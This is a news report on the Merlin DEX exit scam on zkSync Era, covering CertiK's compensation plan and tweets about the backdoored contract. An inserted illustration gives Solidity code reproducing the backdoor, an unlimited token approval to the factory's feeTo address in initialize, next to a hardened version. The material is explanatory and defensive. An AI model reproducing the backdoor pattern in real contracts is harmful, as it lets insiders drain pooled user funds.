Blockchain security firm CertiK is launching a compensation plan with Ethereum’s Layer 2 scaling platform zkSync Era to cover $2 million lost during a public sale of MAGE tokens from decentralized exchange Merlin.
In a statement to Cointelegraph on April 26, CertiK reiterated that it is investigating the exit scam and has also recruited the remaining Merlin team to start the compensation plan. The company said:
“Early investigations indicate that rogue developers are based in Europe, and CertiK will work with law enforcement to track them down if direct negotiation is unsuccessful.”
The blockchain security company urges the rogue developer to return 80% of the stolen funds, awarding the remaining 20% as an ethical hacker bounty.
The firm also noted that it is “committed to helping affected users” even though private key privileges fall outside the scope of a smart contract audit.
Merlin lost around $850,000 worth of USD Coin (USDC) and a few more relatively illiquid tokens on April 26 during its three-day public MAGE token sale with no estimated limit. Blockchain data suggests that an attacker with control over the liquidity pool was able to easily siphon off the funds.
We did some research on Merlin smart contracts and we identified the malicious code responsible for the draining of funds.
These two lines of code in the initialize function are essentially granting approval for the feeTo address to transfer an unlimited (type(uint256).max)… pic.twitter.com/mIksh4HkhB
— eZKalibur ∎ (@zkaliburDEX) April 26, 2023
CertiK, which audited the Merlin code, responded with its initial findings, pointing to a “potential private key management problem.”
We’re actively investigating the @TheMerlinDEX incident. Initial findings point to a potential private key management issue rather than an exploit as the root-cause.
While audits cannot prevent private key issues, we always highlight best practices to projects.
Should any foul…
— CertiK (@CertiK) April 26, 2023
The crypto community on Twitter questioned the CertiK audit, suggesting that the incident could have been a rug pull.
Verichains founder Thanh Nguyen alluded to a “back door” present in Merlin’s code, stating that it is a “clear security risk, as there is no use case that requires its approval.”
3/4 However, in the Merlin code, there is a “backdoor” code (L87-88) that allows the feeTo of MerlinFactory to transfer all assets in the pair, in addition to the fee in the swap function. This backdoor is a clear security risk as there is no use case that requires its approval. pic.twitter.com/HAnwZT27ZS
— Thanh Nguyen (@redragonvn) April 26, 2023
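The mechanism both threads above describe (an unlimited approve to the factory's feeTo inside initialize) is reconstructed here as an added illustration beside a hardened form. This is not Merlin's, CertiK's or Verichains' code: the contract and interface names are hypothetical, and the bounded fee transfer stands in for a real pair's full swap logic.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical minimal interfaces; names are assumptions, not Merlin's.
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address to, uint256 amount) external returns (bool);
}
interface IPairFactory {
    function feeTo() external view returns (address);
}

// Pattern described in the threads above: initialize() hands the factory's
// feeTo an unlimited allowance over both pool tokens, so that address can
// later transferFrom() the whole reserve, not just the swap fee.
contract BackdooredPair {
    address public immutable factory;
    address public token0;
    address public token1;
    constructor() { factory = msg.sender; }
    function initialize(address _token0, address _token1) external {
        require(msg.sender == factory, "FORBIDDEN");
        (token0, token1) = (_token0, _token1);
        // The backdoor: a pool should never approve() its reserves to anyone.
        IERC20(_token0).approve(IPairFactory(factory).feeTo(), type(uint256).max);
        IERC20(_token1).approve(IPairFactory(factory).feeTo(), type(uint256).max);
    }
}

// Hardened form: no allowance is ever granted. Protocol fees leave the pair
// only through an explicit, bounded transfer that the swap path computes,
// so the most feeTo can ever receive is visible in the code under review.
contract HardenedPair {
    address public immutable factory;
    address public token0;
    address public token1;
    constructor() { factory = msg.sender; }
    function initialize(address _token0, address _token1) external {
        require(msg.sender == factory, "FORBIDDEN");
        (token0, token1) = (_token0, _token1);
    }
    // Called by the swap logic with the fee it has just computed (assumed).
    function _payProtocolFee(address token, uint256 feeAmount) internal {
        address feeTo = IPairFactory(factory).feeTo();
        if (feeTo != address(0) && feeAmount > 0) {
            require(IERC20(token).transfer(feeTo, feeAmount), "FEE_FAILED");
        }
    }
}
```

A quick review check for this class of issue is to search a pool contract for any `approve(` call on its own reserve tokens, and to read the on-chain allowance a live pair has granted to privileged addresses such as feeTo.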
“While audits can identify potential risks and vulnerabilities, they cannot prevent malicious activity by rogue developers, such as rug pulls,” CertiK said in a statement to Cointelegraph. “We encourage users to look for projects with a ‘KYC flag’ as an added layer of security, which means that the project has voluntarily gone through a KYC vetting process.”
The company explained that doing so can help reduce and mitigate the risk of insider threats, such as rug pulls.
CertiK said it would continue to provide updates on its compensation plan and the current investigation.